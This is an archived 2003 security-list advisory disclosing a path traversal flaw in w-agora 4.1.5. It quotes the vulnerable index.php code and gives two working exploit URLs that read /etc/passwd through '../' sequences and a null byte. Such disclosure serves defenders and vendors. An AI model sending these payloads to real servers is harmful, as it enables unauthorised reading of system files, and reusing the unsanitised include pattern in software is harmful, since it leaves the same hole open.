Bug in w-agora

• Previous message: Sylvain Robitaille: "Re: IMP 2.x SQL injection vulnerabilities"
• Next in thread: Nicob: "Re: Bug in w-agora"
• Reply: Nicob: "Re: Bug in w-agora"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

   =======================
   ==Shell Security Team==
   =======================


==============================
====Advisory For W-agora======
==============================

- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora


The bug :
==========

index.php

        if (empty($bn)) {
# No forum selected -> default to 'site' configuration
                $site = empty($site) ? "agora" : $site;

                $cfg_file = "${cfg_dir}/site_${site}.${ext}";
                $expnd = "all";
        } else {
                $cfg_file = "${cfg_dir}/${bn}.${ext}";
        }
           

 
Exploit :
=========


index.php

http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00

And modules.php

http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1



Any Question :
==============

Sonyy --> Sonico60at_private

• Next message: Mandrake Linux Security Team: "MDKSA-2003:002 - Updated xpdf packages fix integer overflow vulnerability"
• Previous message: Sylvain Robitaille: "Re: IMP 2.x SQL injection vulnerabilities"
• Next in thread: Nicob: "Re: Bug in w-agora"
• Reply: Nicob: "Re: Bug in w-agora"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jan 15 2003 - 10:38:26 PST